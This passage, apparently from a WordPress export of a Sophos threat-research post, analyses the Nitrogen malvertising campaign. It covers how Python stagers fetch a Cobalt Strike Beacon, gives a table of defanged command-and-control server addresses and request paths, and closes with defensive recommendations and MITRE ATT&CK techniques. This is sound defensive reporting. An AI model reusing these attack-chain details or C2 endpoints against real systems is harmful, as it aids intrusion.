contains the URL of the next stage; for example, the script work3.py downloads the file work3 from the same server. 
The downloaded work3 file is a Cobalt Strike Beacon.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-16.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92949\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-16.png\" alt=\"Code executed by the python scripts\" width=\"640\" height=\"270\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-16.png 780w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-16.png?resize=300,127 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-16.png?resize=768,324 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 16: Compiled object executed by work*.py<\/em><\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-17.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92950\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-17.png\" alt=\"Hex code showing the URL for a command-and-control server used by Cobalt Strike\" width=\"613\" height=\"602\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-17.png 613w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-17.png?resize=300,295 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-17.png?resize=32,32 32w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-17.png?resize=50,50 50w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-17.png?resize=64,64 64w\" sizes=\"auto, (max-width: 613px) 100vw, 613px\" \/><\/a><\/p>\n<p><em>Figure 17: Compiled code containing a Cobalt Strike C2 server URL<\/em><\/p>\n<p>SophosLabs was able to recover several Cobalt Strike Beacons from targeted servers:<\/p>\n<table>\n<tbody>\n<tr>\n<td width=\"319\"><strong>C2 Server<\/strong><\/td>\n<td 
width=\"319\"><strong>HttpPostUri<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"319\">45.81.39[.]177,\/jquery-3.3.1.min.js<\/td>\n<td width=\"319\">\/jquery-3.3.2.min.js<\/td>\n<\/tr>\n<tr>\n<td width=\"319\">45.81.39[.]175,\/jquery-3.3.1.min.js<\/td>\n<td width=\"319\">\/jquery-3.3.2.min.js<\/td>\n<\/tr>\n<tr>\n<td width=\"319\">167.88.164[.]141,\/jquery-3.3.1.min.js<\/td>\n<td width=\"319\">\/jquery-3.3.2.min.js<\/td>\n<\/tr>\n<tr>\n<td width=\"319\">45.66.230[.]215,\/jquery-3.3.1.min.js<\/td>\n<td width=\"319\">\/jquery-3.3.2.min.js<\/td>\n<\/tr>\n<tr>\n<td width=\"319\">45.66.230[.]216,\/jquery-3.3.1.min.js<\/td>\n<td width=\"319\">\/jquery-3.3.2.min.js<\/td>\n<\/tr>\n<tr>\n<td width=\"319\">23.227.196[.]140,\/broadcast<\/td>\n<td width=\"319\">\/1\/events\/com.amazon.csm.csa.prod<\/td>\n<\/tr>\n<tr>\n<td width=\"319\">85.217.144[.]164,\/broadcast<\/td>\n<td width=\"319\">\/1\/events\/com.amazon.csm.csa.prod<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p>Sophos detected and remediated the observed infections before the threat actors were able to perform further hands-on-keyboard activity or deploy additional payloads.<\/p>\n<h2>Conclusion \u2013 an initial-access work in progress<\/h2>\n<p>Abuse of pay-per-click advertisements displayed in search engine results has become a popular tactic among threat actors. Given the various types of trojanized installers leading to Nitrogen infections, we assess that the threat actors are trying to cast a wide net to lure unsuspecting users seeking certain IT utilities, and it is likely this campaign will attempt to impersonate other types of popular software to deliver Nitrogen in future attacks.<\/p>\n<p>The threat actors attempted to mask their activity through various techniques, which highlights the importance of comprehensive and robust detection solutions. 
Sophos products protect against various aspects of this campaign; specifically, in the observed cases, HeapHeapProtect provided quick identification and remediation of unauthorized access and follow-on activity in targeted environments. Additionally, Sophos\u2019 memory detections for Cobalt Strike components spot and flag further compromise tactics, allowing for dynamic detection throughout the attack chain.<\/p>\n<h2>Recommendations<\/h2>\n<ul>\n<li>Be wary of advertisements served in search engine results<\/li>\n<li>Use ad-blocking extensions or run the defaults in browsers with built-in ad-blocking capabilities. When choosing an ad-blocker, we recommend opting into those that allow you to block \u201cnon-intrusive advertising,\u201d thus restricting ads that search engines post on their own sites.<\/li>\n<li>Consider restricting the capability to mount virtual file systems via Group Policy Objects (GPO)<\/li>\n<li>Beware of downloading abnormal file extensions\n<ul>\n<li>Since the security crackdown on Office macros, <a href=\"https:\/\/news.sophos.com\/en-us\/2022\/10\/12\/are-threat-actors-turning-to-archives-and-disk-images-as-macro-usage-dwindles\/\">threat actors have increasingly used password-protected archives<\/a> (.zip, .rar), along with virtual file system formats, such as .iso, .vhd, and .img.<\/li>\n<li>Consider disabling auto-mounting of disk image files, such as .iso files.<\/li>\n<\/ul>\n<\/li>\n<li>Be aware of suspicious-looking websites and keep an eye out for indicators of phishing, such as:\n<ul>\n<li>A call to urgency<\/li>\n<li>Misspellings and poor grammar<\/li>\n<li>Unprofessional marketing<\/li>\n<\/ul>\n<\/li>\n<li>Avoid storing credentials within the Registry and proactively search for credentials in the Registry to remediate potential risk.
If software must store credentials in the Registry, then ensure associated accounts have limited permissions to avoid abuse if they are acquired by a threat actor.<\/li>\n<\/ul>\n<h2>Indicators of Compromise<\/h2>\n<p>A full set of related indicators of compromise is available <a href=\"https:\/\/github.com\/sophoslabs\/IoCs\/blob\/master\/Nitrogen%202023-07.csv\">on our GitHub<\/a>.<\/p>\n<h2>MITRE TTPs identified in this analysis<\/h2>\n<p>T1583.001: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1583\/001\/\">Acquire Infrastructure: Domains<\/a><\/p>\n<p>T1583.008: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1583\/008\/\">Acquire Infrastructure: Malvertising<\/a><\/p>\n<p>T1584.001: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1584\/001\/\">Compromise Infrastructure: Domains<\/a><\/p>\n<p>T1608.001: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1608\/001\/\">Stage Capabilities: Upload Malware<\/a><\/p>\n<p>T1588.002: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1588\/002\/\">Obtain Capabilities: Tool<\/a><\/p>\n<p>T1574.002: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1574\/002\/\">Hijack Execution Flow: DLL Side-Loading<\/a><\/p>\n<p>T1053.005: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1053\/005\/\">Scheduled Task\/Job: Scheduled Task<\/a><\/p>\n<p>T1069.002: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1069\/002\/\">Permission Groups Discovery: Domain Groups<\/a><\/p>\n<p>T1552.002: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1552\/002\/\">Unsecured Credentials: Credentials in Registry<\/a><\/p>\n<p>T1547.001: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1547\/001\/\">Boot or Logon Autostart Execution: Registry Run Keys \/ Startup Folder<\/a><\/p>\n<p>T1553.005: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1553\/005\/\">Subvert Trust Controls: Mark-of-the-Web Bypass<\/a><\/p>\n<p>&nbsp;<\/p>\n<\/p><\/div>\n<p><a 
href=\"https:\/\/news.sophos.com\/en-us\/2023\/07\/26\/into-the-tank-with-nitrogen\/\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/sophos\/dgdY<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/nitrogen-hero-image.jpg\"\/><\/p>\n<p><strong>Credit to Author: Gabor Szappanos| Date: Wed, 26 Jul 2023 10:00:04 +0000<\/strong><\/p>\n<p>The element originally known as \u201cfoul air\u201d stinks up computers as a new initial-access campaign exhibiting some uncommon techniques<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10378,10377],"tags":[129,29861,10531,29862,28079,27030,16771],"class_list":["post-22546","post","type-post","status-publish","format-standard","hentry","category-security","category-sophos","tag-featured","tag-initial-access","tag-malvertising","tag-nitrogen","tag-sideloading","tag-sophos-x-ops","tag-threat-research"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/22546","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=22546"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/22546\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=22546"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\
/index.php\/wp-json\/wp\/v2\/categories?post=22546"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=22546"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}